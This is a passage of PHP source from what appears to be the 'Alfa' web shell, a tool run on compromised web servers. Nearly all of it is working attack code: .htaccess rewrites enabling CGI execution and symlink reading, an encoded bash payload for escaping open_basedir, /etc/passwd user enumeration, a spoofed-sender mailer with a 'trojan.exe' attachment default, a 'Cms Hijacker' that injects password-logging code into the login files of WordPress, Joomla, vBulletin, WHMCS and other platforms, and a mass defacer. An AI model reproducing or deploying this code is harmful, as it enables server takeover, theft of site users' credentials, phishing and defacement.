5475$readme = "";
5476if($symname){$readme="\nReadmeName ".trim($symname);}
5477if($m=='cgi'){
5478$code = "#Coded By Sole Sad & Invisible\nOptions FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .alfa\nAddHandler cgi-script .alfa";
5479}elseif($m=='sym'){
5480$code = "#Coded By Sole Sad & Invisible\nOptions Indexes FollowSymLinks\nDirectoryIndex solevisible.phtm\nAddType text/plain php html php4 phtml\nAddHandler text/plain php html php4 phtml{$readme}\nOptions all";
5481}elseif($m=='shtml'){
5482$code = "Options +Includes\nAddType text/html .shtml\nAddHandler server-parsed .shtml";
5483}
5484@__write_file($d.'.htaccess',$code);
5485}
5486function alfabasedir(){
5487alfahead();
5488echo '<div class=header>
5489<center><p><div class="txtfont_header">| Open Base Dir |</div></p></center>';
5490$passwd = _alfa_file('/etc/passwd');
5491if(is_array($passwd)){
5492$users = array();
5493$makepwd = alfaMakePwd();
5494$basedir = @ini_get('open_basedir');
5495$safe_mode = @ini_get('safe_mode');
5496if(_alfa_can_runCommand(true,false)&&($basedir||$safe_mode)){
5497$bash = "fZBPSwMxEMXPzacYx9jugkvY9lbpTQ9eFU9NWdYk2wYkWZKsgmu+u9NaS8E/cwgDL/N+M+/yQjxbJ+KO3d4/rHjNusGpZL2DmEITTP/SKlOUIwOqNVTvgLxG2MB0CsGkITioz7X5P9riN60hzhHTvLYn5IoXfbAudYBXUUqHX9wPiEZDZQCj4OM807PIYovlwevHxPiHe0aWmVE7f7BaS4Ws8wEsWAe8UEOCSi+h6moQJinRtzG+6fIGtGeTp8c7Cqo4i4dAFB7xxiGakPdgSxtN6OxA/X7gePk3UtIPiddMe2dOe8wQN7NP";
5498alfaWriteTocgiapi("basedir.alfa",$bash);
5499$bash_users = alfaEx("cd alfacgiapi;sh basedir.alfa ".$makepwd,false,true,true);
5500$users = json_decode($bash_users, true);
5501$x=count($users);
5502if($x>=2){array_pop($users);--$x;}
5503}
5504if(!$basedir&&!$safe_mode){
5505$x=0;
5506foreach($passwd as $str){
5507$pos = strpos($str,':');
5508$username = substr($str,0,$pos);
5509$dirz = str_replace("{user}", $username, $makepwd);
5510if(($username != '')){
5511if (@is_readable($dirz)){
5512array_push($users,$username);
5513$x++;
5514}}}
5515}
5516echo '<br><br>';
5517echo "<b><font color=\"#00A220\">[+] Founded ".sizeof($passwd)." entrys in /etc/passwd\n"."<br /></font></b>";
5518echo "<b><font color=\"#FFFFFF\">[+] Founded ".$x." readable ".str_replace("{user}", "*", $makepwd)." directories\n"."<br /></font></b>";
5519echo "<b><font color=\"#FF0000\">[~] Searching for passwords in config files...\n\n"."<br /><br /><br /></font></b>";
5520foreach($users as $user){
5521if(empty($user))continue;
5522$path = str_replace("{user}", $user, $makepwd);
5523echo "<form method=post onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span><font color=#27979B>Change Dir <font color=#FFFF01>..:: </font><font color=red><b>$user</b></font><font color=#FFFF01> ::..</font></font></span><br><input class='foottable' type=text name=c value='$path'><input type=submit value='>>'></form><br>";
5524}
5525}else{echo('<b> <center><font color="#FFFFFF">[-] Error : coudn`t read /etc/passwd [-]</font></center></b>');}
5526echo '<br><br></b>';
5527echo '</div>';
5528alfafooter();
5529}
5530function alfamail(){
5531alfahead();
5532echo '<div class=header>';
5533AlfaNum(8,9,10);
5534echo '<center><p><div class="txtfont_header">| Fake Mail |</div></p><form action="" method="post" onsubmit="g(\'mail\',null,this.mail_to.value,this.mail_from.value,this.mail_subject.value,\'>>\',this.mail_content.value,this.count_mail.value,this.mail_attach.value); return false;">';
5535$table = array(
5536'td1' => array('color' => 'FFFFFF', 'tdName' => 'Mail To : ', 'inputName' => 'mail_to', 'inputValue' => 'target@fbi.gov', 'inputSize' => '60','placeholder' => true),
5537'td2' => array('color' => 'FFFFFF', 'tdName' => 'From : ', 'inputName' => 'mail_from', 'inputValue' => 'sec@google.com', 'inputSize' => '60', 'placeholder' => true),
5538'td3' => array('color' => 'FFFFFF', 'tdName' => 'Subject : ', 'inputName' => 'mail_subject', 'inputValue' => 'your site hacked by me', 'inputSize' => '60'),
5539'td4' => array('color' => 'FFFFFF', 'tdName' => 'Attach File : ', 'inputName' => 'mail_attach', 'inputValue' => $GLOBALS['cwd'].'trojan.exe', 'inputSize' => '60'),
5540'td5' => array('color' => 'FFFFFF', 'tdName' => 'Count Mail : ', 'inputName' => 'count_mail', 'inputValue' => '1', 'inputSize' => '60')
5541);
5542create_table($table);
5543echo '<p><div class="txtfont">Message:</div></p><textarea rows="6" cols="60" name="mail_content">Hi Dear Admin :)</textarea><p><input type="submit" value=" " name="mail_send" /></p></form></center>';
5544if(isset($_POST['alfa4'])&&($_POST['alfa4'] == '>>')){
5545$mail_to = $_POST['alfa1'];
5546$mail_from = $_POST['alfa2'];
5547$mail_subject = $_POST['alfa3'];
5548$mail_content = $_POST['alfa5'];
5549$count_mail = (int)$_POST['alfa6'];
5550$mail_attach = $_POST['alfa7'];
5551if(filter_var($mail_to, FILTER_VALIDATE_EMAIL)){
5552if(!empty($mail_attach)&&@is_file($mail_attach)){
5553$file = $mail_attach;
5554$content = __read_file($file);
5555$content = chunk_split(__ZW5jb2Rlcg($content));
5556$uid = md5(uniqid(time()));
5557$filename = basename($file);
5558$headers = "From: ".$mail_from." <".$mail_from.">\r\n";
5559$headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n";
5560$headers .= "Reply-To: ".$mail_from."\r\n";
5561$headers .= "Content-Type: multipart/mixed; boundary=\"".$uid."\"\r\n\r\n";
5562$headers .= 'MIME-Version: 1.0' . "\r\n";
5563$headers .= 'X-Mailer: php' . "\r\n";
5564$mail_content = "--".$uid."\r\n";
5565$mail_content .= "Content-type:text/plain; charset=iso-8859-1\r\n";
5566$mail_content .= "Content-Transfer-Encoding: 7bit\r\n\r\n";
5567$mail_content .= $mail_content."\r\n\r\n";
5568$mail_content .= "--".$uid."\r\n";
5569$mail_content .= "Content-Type: application/octet-stream; name=\"".$filename."\"\r\n";
5570$mail_content .= "Content-Transfer-Encoding: base64\r\n";
5571$mail_content .= "Content-Disposition: attachment; filename=\"".$filename."\"\r\n\r\n";
5572$mail_content .= $content."\r\n\r\n";
5573$mail_content .= "--".$uid."--";
5574}else{
5575$headers = "From: " . $mail_from. " ( ".$mail_from." ) \r\n";
5576$headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n";
5577$headers .= 'Reply-To: '.$mail_from.'' . "\r\n";
5578$headers .= 'Content-type: text/html; charset=utf-8' . "\r\n";
5579$headers .= 'MIME-Version: 1.0' . "\r\n";
5580$headers .= 'X-Mailer: php' . "\r\n";
5581}
5582if(empty($count_mail)||$count_mail<1)$count_mail=1;
5583if(!empty($mail_from)){echo __pre();
5584for($i=1;$i<=$count_mail;$i++){
5585if(@mail($mail_to,$mail_subject,$mail_content,$headers))echo("<center>Sent -> $mail_to<br></center>");
5586}}else{__alert("Invalid Mail From !");}
5587}else{__alert("Invalid Mail To !");}
5588}
5589echo('</div>');
5590alfafooter();
5591}
5592function alfaziper(){
5593alfahead();
5594AlfaNum(8,9,10);
5595echo '<div class=header><p><center><p><div class="txtfont_header">| Compressor |</div></p>
5596<form onSubmit="g(\'ziper\',null,null,null,this.dirzip.value,this.zipfile.value,\'>>\');return false;" method="post">
5597<div class="txtfont">Dir/File: </div> <input type="text" name="dirzip" value="'.htmlspecialchars($GLOBALS['cwd']).'" size="60"/>
5598<div class="txtfont">Save Dir: </div> <input type="text" name="zipfile" value="'.$GLOBALS['cwd'].'alfa.zip" size="60"/>
5599<input type="submit" value=" " name="ziper" />
5600</form></center></p>';
5601if(isset($_POST['alfa5']) && ($_POST['alfa5'] == '>>')){
5602$dirzip = $_POST['alfa3'];
5603$zipfile = $_POST['alfa4'];
5604if (class_exists('ZipArchive')&&($GLOBALS['sys']!='unix'||!_alfa_can_runCommand(true,true))){
5605$code='if(!extension_loaded(\'zip\')||!file_exists($source)){return false;}$zip=new ZipArchive();if(!$zip->open($destination,ZIPARCHIVE::CREATE)){return false;}$source=str_replace(\'\\\\\',\'/\',realpath($source));if(is_dir($source)===true){$files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source),RecursiveIteratorIterator::SELF_FIRST);foreach($files as $file){$file=str_replace(\'\\\\\',\'/\',$file);if(in_array(substr($file,strrpos($file,\'/\')+1),array(\'.\',\'..\')))continue;$file=realpath($file);if(is_dir($file)===true){$zip->addEmptyDir(str_replace($source.\'/\',\'\',$file.\'/\'));}else if(is_file($file)===true){$zip->addFromString(str_replace($source.\'/\',\'\',$file),file_get_contents($file));}}}else if(is_file($source)===true){$zip->addFromString(basename($source),file_get_contents($source));}return $zip->close();';
5606$newfunc = create_function('$source,$destination', $code);
5607if($newfunc($dirzip, $zipfile)){
5608echo __pre().'<center><p><font color="green">Success...!<br>'.$zipfile.'</font></p></center>';
5609}else{echo __pre().'<center><p><font color="red">ERROR!!!...</font></p></center>';}
5610}else{
5611alfaEx("cd '".addslashes(dirname($zipfile))."';zip -r '".addslashes(basename($zipfile))."' '".addslashes($dirzip)."' > /dev/null &");
5612echo __pre().'<center><p>Please Wait For 1 minutes AND Check this -> <b><font color="green">'.$zipfile.'</font></b><br>Because We Executed The Command in The background !</p></center>';
5613}}
5614echo '</div>';
5615alfafooter();
5616}
5617function alfacmshijacker(){
5618alfahead();
5619AlfaNum(5,6,7,8,9,10);
5620echo '<div class=header><br>
5621<center><div class="txtfont_header">| Cms Hijacker |</div><br><br><form onSubmit="g(\'cmshijacker\',null,this.cmshi.value,this.saveto.value,\'>>\',this.cmspath.value);return false;" method=\'post\'>
5622<div class="txtfont">CMS: <select style="width:100px;" name="cmshi">';
5623$cm_array = array("vb"=>"vBulletin","wp"=>"wordpress","jom"=>"joomla","whmcs"=>"whmcs","mybb"=>"mybb","ipb"=>"ipboard","phpbb"=>"phpbb");
5624foreach($cm_array as $key=>$val)echo '<option value="'.$key.'">'.$val.'</option>';
5625echo("</select>");
5626echo ' Path installed cms: <input size="50" type="text" name="cmspath" placeholder="ex: /home/user/public_html/vbulletin/">
5627SaveTo: <input size="50" type="text" name="saveto" value="'.$GLOBALS['cwd'].'alfa.txt"></font>
5628<input type="submit" name="btn" value=" "></form></center><br>';
5629$cms = $_POST['alfa1'];
5630$saveto = $_POST['alfa2'];
5631$cmspath = $_POST['alfa4'];
5632if(!empty($cms) AND !empty($saveto) AND $_POST['alfa4'] AND $_POST['alfa3'] == '>>'){
5633echo __pre();
5634alfaHijackCms($cms,$cmspath,$saveto);
5635}
5636echo '</div>';
5637alfafooter();
5638}
5639function alfaHijackCms($cms,$cmspath,$saveto){
5640switch($cms){
5641case "vb":
5642hijackvBulletin($cmspath,$saveto);
5643break;
5644case "wp":
5645hijackwp($cmspath,$saveto);
5646break;
5647case "jom":
5648hijackJoomla($cmspath,$saveto);
5649break;
5650case "whmcs":
5651hijackWhmcs($cmspath,$saveto);
5652break;
5653case "mybb":
5654hijackMybb($cmspath,$saveto);
5655break;
5656case "ipb":
5657hijackIPB($cmspath,$saveto);
5658break;
5659case "phpbb":
5660hijackPHPBB($cmspath,$saveto);
5661break;
5662default:
5663echo "error!";
5664break;
5665}
5666}
5667function hijackvBulletin($path,$saveto){
5668$code='$alfa_username = strtolower($vbulletin->GPC["vb_login_username"]);$alfa_password = $vbulletin->GPC["vb_login_password"];$alfa_file = "{saveto_path}";$sql_query = $db->query_read("SELECT * FROM " . TABLE_PREFIX . "user WHERE `username`=\'" . $alfa_username . "\'");while($row = $db->fetch_array($sql_query)){if(strlen($alfa_password) > 1 AND strlen($alfa_username) > 1){$fp1 = @fopen($alfa_file, "a+");@fwrite($fp1, $alfa_username . \' : \' . $alfa_password." (" . $row["email"] . ")\n");@fclose($fp1); $f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';
5669$clearpw = 'defined(\'DISABLE_PASSWORD_CLEARING\')';
5670$code=str_replace('{saveto_path}',$saveto,$code);
5671$login = $path."/login.php";
5672$class = $path."/includes/class_bootstrap.php";
5673$dologin = 'do_login_redirect();';
5674$evil_login = "\t".$code."\n\t".$dologin;
5675$evil_class = "true";
5676if(@is_file($login) AND @is_writable($login) AND @is_file($class) AND @is_writable($class)){
5677$data_login = @file_get_contents($login);
5678$data_class = @file_get_contents($class);
5679if(strstr($data_login, $dologin) AND strstr($data_class, $clearpw)){
5680$login_replace = str_replace($dologin,$evil_login, $data_login);
5681$class_replace = str_replace($clearpw,$evil_class, $data_class);
5682@file_put_contents($login, $login_replace);
5683@file_put_contents($class, $class_replace);
5684hijackOutput(0,$saveto);
5685}else{
5686hijackOutput(1);
5687}
5688}else{
5689hijackOutput(1);
5690}
5691}
5692function hijackwp($path,$saveto){
5693$code = '$alfa_file="{saveto_path}";$fp = fopen($alfa_file, "a+");fwrite($fp, $_POST[\'log\']." : ".$_POST[\'pwd\']." (".($user->user_email).")\n");fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';
5694$redirect_wp = 'if ( !is_wp_error($user) && !$reauth ) {';
5695$code=str_replace('{saveto_path}',$saveto,$code);
5696$login=$path."/wp-login.php";
5697$evil_login = "\t".$redirect_wp."\n\t".$code;
5698if(@is_file($login) AND @is_writable($login)){
5699$data_login = @file_get_contents($login);
5700if(strstr($data_login, $redirect_wp)){
5701$login_replace = str_replace($redirect_wp,$evil_login, $data_login);
5702@file_put_contents($login, $login_replace);
5703hijackOutput(0,$saveto);
5704}else{
5705hijackOutput(1);
5706}
5707}else{
5708hijackOutput(1);
5709}
5710}
5711function hijackJoomla($path,$saveto){
5712$code = '<?php jimport(\'joomla.user.authentication\');$Alfa_auth = & JAuthentication::getInstance();$Alfa_data = array(\'username\'=>$_POST[\'username\'],\'password\'=>$_POST[\'passwd\']);$Alfa_options = array();$Alfa_response = $Alfa_auth->authenticate($Alfa_data, $Alfa_options);if($Alfa_response->status == 1){$alfa_file="{saveto_path}";$fp=@fopen($alfa_file,"a+");@fwrite($fp, $Alfa_response->username.":".$_POST[\'passwd\']." ( ".$Alfa_response->email." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}?>';
5713$code=str_replace('{saveto_path}',$saveto,$code);
5714$comp=$path."/administrator/components/com_login/";
5715if(@is_file($comp."/login.php")){
5716$login = $comp."/login.php";
5717}elseif(@is_file($comp."/admin.login.php")){
5718$login = $comp."/admin.login.php";
5719}else{
5720$login = '';
5721}
5722if(@is_file($login) AND @is_writable($login) AND $login != ''){
5723$data_login = @file_get_contents($login);
5724$evil_login = $code."\n".$data_login;
5725@file_put_contents($login, $evil_login);
5726hijackOutput(0,$saveto);
5727}else{
5728hijackOutput(1);
5729}
5730}
5731function hijackWhmcs($path,$saveto){
5732$code = '<?php if(isset($_POST[\'username\']) AND isset($_POST[\'password\']) AND !empty($_POST[\'username\']) AND !empty($_POST[\'password\'])){if($alfa_connect=@mysqli_connect($db_host,$db_username,$db_password,$db_name)){$alfa_file = "{saveto_path}";$alfa_uname = @$_POST[\'username\'];$alfa_pw = @$_POST[\'password\'];if(isset($_POST[\'language\'])){$alfa_q = "SELECT * FROM tbladmins WHERE `username` = \'$alfa_uname\' AND `password` = \'".md5($alfa_pw)."\'";$admin = true;}else{$alfa_q = "SELECT * FROM tblclients WHERE `email` = \'$alfa_uname\'";$admin = false;}$alfa_query = mysqli_query($alfa_connect, $alfa_q);if(mysqli_num_rows($alfa_query) > 0 ){$row = mysqli_fetch_array($alfa_query);$allow = true;if(!$admin){$__salt = explode(\':\', $row[\'password\']);$__encPW = md5($__salt[1].$_POST[\'password\']).\':\'.$__salt[1];if($row[\'password\'] == $__encPW){$allow = true;$row[\'username\'] = $row[\'email\'];}else{$allow = false;}}if($allow){$fp = @fopen($alfa_file, "a+");@fwrite($fp, $row[\'username\'] . \' : \' . $alfa_pw." (" . $row["email"] . ") : ".($admin ? \'is_admin\' : \'is_user\')."\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);}}}}?>';
5733$code=str_replace('{saveto_path}',$saveto,$code);
5734$conf=$path."/configuration.php";
5735if(@is_file($conf) AND @is_writable($conf)){
5736$data_conf = @file_get_contents($conf);
5737if(!strstr($data_conf,'?>'))$code = '?>'.$code;
5738$evil_conf = $data_conf."\n".$code;
5739@file_put_contents($conf, $evil_conf);
5740hijackOutput(0,$saveto);
5741}else{
5742hijackOutput(1);
5743}
5744}
5745function hijackMybb($path,$saveto){
5746$code = '$alfa_q = $db->query("SELECT `email` FROM ".TABLE_PREFIX."users WHERE `username` = \'".$user[\'username\']."\'");$alfa_fetch = $db->fetch_array($alfa_q);$alfa_file = "{saveto_path}";$fp = @fopen($alfa_file, "a+");@fwrite($fp, $user[\'username\']." : ". $user[\'password\']." ( ".$alfa_fetch[\'email\']." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);';
5747$find = '$loginhandler->complete_login();';
5748$code=str_replace('{saveto_path}',$saveto,$code);
5749$login=$path."/member.php";
5750$evil_login = "\t".$code."\n\t".$find;
5751if(@is_file($login) AND @is_writable($login)){
5752$data_login = @file_get_contents($login);
5753if(strstr($data_login, $find)){
5754$login_replace = str_replace($find,$evil_login, $data_login);
5755@file_put_contents($login, $login_replace);
5756hijackOutput(0,$saveto);
5757}else{
5758hijackOutput(1);
5759}
5760}else{
5761hijackOutput(1);
5762}
5763}
5764function hijackIPB($path,$saveto){
5765$code = '$Alfa_q = $this->DB->buildAndFetch(array(\'select\' => \'email\', \'from\' => \'members\', \'where\' => \'name="\'.$username.\'" OR email="\'.$email.\'"\'));$Alfa_file = "{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $_POST[\'ips_username\'].\' : \'.$_POST[\'ips_password\'].\' ( \'.$Alfa_q[\'email\'].\' )\'."\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';
5766$find = 'unset( $member[\'plainPassword\'] );';
5767$code=str_replace('{saveto_path}',$saveto,$code);
5768$login=$path."/admin/sources/handlers/han_login.php";
5769$evil_login = "\t".$find."\n\t".$code;
5770if(@is_file($login) AND @is_writable($login)){
5771$data_login = @file_get_contents($login);
5772if(strstr($data_login, $find)){
5773$login_replace = str_replace($find,$evil_login, $data_login);
5774@file_put_contents($login, $login_replace);
5775hijackOutput(0,$saveto);
5776}else{
5777hijackOutput(1);
5778}
5779}else{
5780hijackOutput(1);
5781}
5782}
5783function hijackPHPBB($path,$saveto){
5784$code = '$Alfa_u = request_var(\'username\', \'\');$Alfa_p = request_var(\'password\', \'\');if($Alfa_u != \'\' AND $Alfa_p != \'\'){$Alfa_response = $auth->login($Alfa_u,$Alfa_p);if($Alfa_response[\'status\'] == LOGIN_SUCCESS){$Alfa_file ="{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $Alfa_u." : ".$Alfa_p. " ( ".$Alfa_response[\'user_row\'][\'user_email\']." )\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';
5785$find = 'case \'login\':';
5786$code=str_replace('{saveto_path}',$saveto,$code);
5787$login=$path."/ucp.php";
5788$evil_login = "\t".$find."\n\t".$code;
5789if(@is_file($login) AND @is_writable($login)){
5790$data_login = @file_get_contents($login);
5791if(strstr($data_login, $find)){
5792$login_replace = str_replace($find,$evil_login, $data_login);
5793@file_put_contents($login, $login_replace);
5794hijackOutput(0,$saveto);
5795}else{
5796hijackOutput(1);
5797}
5798}else{
5799hijackOutput(1);
5800}
5801}
5802function hijackOutput($c=0,$p=''){echo($c==0?"<center><font color='green'>Success</font> --> path: $p</center>":'<center><font color="red">Error in inject code !</font></center>');}
5803function Alfa_StrSearcher($dir,$string,$ext,$e,$arr=array()){
5804if(@is_dir($dir)){
5805$files=@scandir($dir);
5806foreach($files as $key => $value){
5807$path=@realpath($dir. DIRECTORY_SEPARATOR .$value);
5808if(!@is_dir($path)){
5809if($ext!='*'){$f = basename($path);$f = explode('.',$f);$f = end($f);if($f!=$ext)continue;}
5810if($e=='str'){
5811$content = @file_get_contents($path);
5812if(strpos($content, $string) !== false){
5813echo str_replace('\\','/',$path) . "<br>";
5814}
5815}else{
5816if(strstr($value,$string)){
5817echo str_replace('\\','/',$path) . "<br>";
5818}
5819}
5820$results[] = $path;
5821}elseif($value != "." && $value != "..") {
5822Alfa_StrSearcher($path,$string,$ext,$e,$results);
5823$results[] = $path;
5824}}}}
5825function alfasearcher(){
5826alfahead();
5827echo '<div class=header><center><p><div class="txtfont_header">| Searcher |</div></p><h3><a href=javascript:void(0) onclick="g(\'searcher\',null,\'file\')">| Find Readable Or Writable Files | </a><a href=javascript:void(0) onclick="g(\'searcher\',null,\'str\')">| Find Files By Name | </a></h3></center>';
5828if(isset($_POST['alfa1'])&&$_POST['alfa1']=='file'){
5829echo '<center><div class="txtfont_header">| Find Readable Or Writable Files |</div><br><br><form name="srch" onSubmit="g(\'searcher\',null,\'file\',this.filename.value,this.ext.value,this.method.value,\'>>\');return false;" method=\'post\'>
5830<div class="txtfont">
5831Method: <select style="width: 18%;" onclick="alfa_searcher_tool(this.value);" name="method"><option value="files">Find All Writable Files</option><option value="dirs">Find All Writable Dirs</option><option value="all">Find All Readable And Writable Files</option></select>
5832Dir: <input size="50" id="target" type="text" name="filename" value="'.$GLOBALS['cwd'].'">
5833Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
5834<input type="submit" name="btn" value=" "></div></form></center><br>';
5835$dir = $_POST['alfa2'];
5836$ext = $_POST['alfa3'];
5837$method = $_POST['alfa4'];
5838if($_POST['alfa5']=='>>'){
5839echo __pre();
5840if(substr($dir,-1)=='/')$dir=substr($dir,0,-1);
5841Alfa_Searcher($dir,trim($ext),$method);
5842}
5843}
5844if($_POST['alfa1']=='str'){
5845echo '<center><div class="txtfont_header">| Find Files By Name / Find String In Files |</div><br><br><form onSubmit="g(\'searcher\',null,\'str\',this.dir.value,this.string.value,\'>>\',this.ext.value,this.method.value);return false;" method=\'post\'>
5846<div class="txtfont">
5847Method: <select name="method"><option value="name">Find Files By Name</option><option value="str">Find String In Files</option></select>
5848String: <input type="text" name="string" value="">
5849Dir: <input size="50" type="text" name="dir" value="'.$GLOBALS['cwd'].'">
5850Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
5851<input type="submit" name="btn" value=" "></div></form></center><br>';
5852$dir = $_POST['alfa2'];
5853$string = $_POST['alfa3'];
5854$ext = $_POST['alfa5'];
5855if(!empty($string) AND !empty($dir) AND $_POST['alfa4'] == '>>'){
5856echo __pre();
5857Alfa_StrSearcher($dir,$string,$ext,$_POST['alfa6']);
5858}
5859}
5860echo '</div>';
5861alfafooter();
5862}
5863function alfaMassDefacer(){
5864alfahead();
5865AlfaNum(5,6,7,8,9,10);
5866echo "<div class=header><center><p><div class='txtfont_header'>| Mass Defacer |</div></p><form onSubmit=\"g('MassDefacer',null,this.massdir.value,this.defpage.value,this.method.value,'>>');return false;\" method='post'>";
5867echo '<div class="txtfont">Deface Method: <select name="method"><option value="index">Deface Index Dirs</option><option value="all">All Files</option></select>
5868 Mass dir: <input size="50" id="target" type="text" name="massdir" value="'.htmlspecialchars($GLOBALS['cwd']).'">
5869 DefPage: <input size="50" type="text" name="defpage" value="'.htmlspecialchars($GLOBALS['cwd']).'"></div> <input type="submit" name="btn" value=" "></center></p>
5870</form>';
5871$dir = $_POST['alfa1'];
5872$defpage = $_POST['alfa2'];
5873$method = $_POST['alfa3'];
5874$fCurrent = $GLOBALS['__file_path'];
5875if($_POST['alfa4'] == '>>'){
5876if(!empty($dir)){
5877if(@is_dir($dir)){
5878if(@is_readable($dir)){
5879if(@is_file($defpage)){
5880if($dh = @opendir($dir)){
5881echo __pre();
5882while (($file = @readdir($dh)) !== false){
5883if($file == '..' || $file == '.')continue;
5884$newfile=$dir.$file;
5885if($fCurrent == $newfile)continue;
5886if(@is_dir($newfile)){
5887Alfa_ReadDir($newfile,$method,$defpage);
5888}else{
5889if(!@is_writable($newfile))continue;
5890if(!@is_readable($newfile))continue;
5891Alfa_Rewriter($newfile,$file,$defpage,$method);
5892}
5893}
5894closedir($dh);
5895}else{__alert('<font color="red">Error In OpenDir...</font>');}
5896}else{__alert('<font color="red">DefPage File NotFound...</font>');}
5897}else{__alert('<font color="red">Directory is not Readable...</font>');}
5898}else{__alert('<font color="red">Mass Dir is Invalid Dir...</font>');}
5899}else{__alert('<font color="red">Dir is Empty...</font>');}
5900}
5901echo '</div>';
5902alfafooter();
5903}
5904function Alfa_ReadDir($dir,$method='',$defpage=''){
5905if(!@is_readable($dir)) return false;
5906if (@is_dir($dir)) {
5907if ($dh = @opendir($dir)) {
5908while(($file=readdir($dh))!==false) {
5909if($file == '..' || $file == '.')continue;
5910$newfile=$dir.'/'.$file;
5911if(@is_readable($newfile)&&@is_dir($newfile))Alfa_ReadDir($newfile,$method,$defpage);
5912if(@is_file($newfile)){
5913if(!@is_readable($newfile))continue;
5914Alfa_Rewriter($newfile,$file,$defpage,$method);
5915}
5916}
5917closedir($dh);
5918}
5919}
5920}
5921function Alfa_Rewriter($dir,$file,$defpage,$m='index'){
5922if(!@is_writable($dir)) return false;
5923if(!@is_readable($dir)) return false;
5924$defpage=@file_get_contents($defpage);
5925if($m == 'index'){
5926$indexs = array('index.php','index.htm','index.html','default.asp','default.aspx','index.asp','index.aspx','index.js');
5927if(in_array(strtolower($file),$indexs)){
5928@file_put_contents($dir,$defpage);
5929echo @is_file($dir)?$dir."<b><font color='red'>DeFaced...</b></font><br>" : '';
5930}
5931}elseif($m=='all'){
5932@file_put_contents($dir,$defpage);
5933echo @is_file($dir)?$dir." <b><font color='red'>DeFaced...</b></font><br>" : '';
5934}
5935}
5936function alfaGetDisFunc(){
5937alfahead();
5938echo '<div class="header">';
5939$disfun = @ini_get('disable_functions');
5940$s = explode(',',$disfun);
5941$f = array_unique($s);
5942echo '<center><br><b><font color="#7CFC00">Disable Functions</font></b><pre><table border="1"><tr><td align="center" style="background-color: green;color: white;width:5%">#</td><td align="center" style="background-color: green;color: white;">Func Name</td></tr>';
5943$i=1;
5944foreach($f as $s){
5945$s=trim($s);
5946if(function_exists($s)||!is_callable($s))continue;
5947echo '<tr><td align="center" style="background-color: black;">'.$i.'</td>';
5948echo '<td align="center" style="background-color: black;"><a style="text-decoration: none;" target="_blank" href="http://php.net/manual/en/function.'.str_replace('_','-',$s).'.php"><span class="disable_functions"><b>'.$s.'</b></span></a></td>';
5949$i++;
5950}
5951echo '</table></center>';
5952echo '</div>';
5953alfafooter();
5954}
5955function Alfa_Create_A_Tag($action,$vals){
5956$nulls = array();
5957foreach($vals as $key => $val){
5958echo '<a href=javascript:void(0) onclick="g(\''.$action.'\',';
5959for($i=1;$i<=$val[1]-1;$i++)$nulls[] = 'null';
5960$f = implode(',',$nulls);
5961echo $f.',\''.$val[0].'\');return false;">| '.$key.' | </a>';
5962unset($nulls);
5963}
5964}
5965function Alfa_Searcher($dir, $ext, $method) {
5966if(@is_readable($dir)){
5967if($method == 'all')$ext = '*';
5968if($method == 'dirs')$ext = '*';
5969$globFiles = @glob("$dir/*.$ext");
5970$globDirs = @glob("$dir/*", GLOB_ONLYDIR);
5971$blacklist = array();
5972foreach ($globDirs as $dir) {
5973if(!@is_readable($dir)) continue;
5974@Alfa_Searcher($dir, $ext, $method);
5975}
5976switch($method){
5977case "files":
5978foreach ($globFiles as $file){
5979if(@is_writable($file)){
5980echo "$file<br>";
5981}
5982}
5983break;
5984case "dirs":
5985foreach ($globFiles as $file){
5986if(@is_writable(dirname($file)) && !in_array(dirname($file), $blacklist)){
5987echo dirname($file).'<br>';
5988$blacklist[] = dirname($file);
5989}
5990}
5991break;
5992case "all":
5993foreach ($globFiles as $file){
5994echo $file.'<br>';
5995}
5996break;
5997}
5998unset($blacklist);
5999}
6000}
6001function AlfaiFrameCreator($f,$width='100%',$height='600px'){
6002return('<iframe src="'.$f.'" width="'.$width.'" height="'.$height.'" frameborder="0"></iframe>');
6003}
6004class AlfaCURL {
6005public $headers;
6006public $user_agent;
6007public $compression;
6008public $cookie_file;
6009public $proxy;
6010public $path;
6011public $ssl = false;
6012public $curl_status = true;
6013function __construct($cookies=false,$compression='gzip',$proxy=''){
6014if(!extension_loaded('curl')){$curl_status = false;return false;}
6015$this->headers[] = 'Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg';
6016$this->headers[] = 'Connection: Keep-Alive';
6017$this->headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8';
6018$this->user_agent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)';
6019$this->path = ALFA_TEMPDIR.'/Alfa_cookies.txt';
6020$this->compression=$compression;
6021$this->proxy=$proxy;
6022$this->cookies=$cookies;
6023if($this->cookies)$this->cookie($this->path);
6024}
6025function cookie($cookie_file) {
6026if (_alfa_file_exists($cookie_file,false)) {
6027$this->cookie_file=$cookie_file;
6028}else{
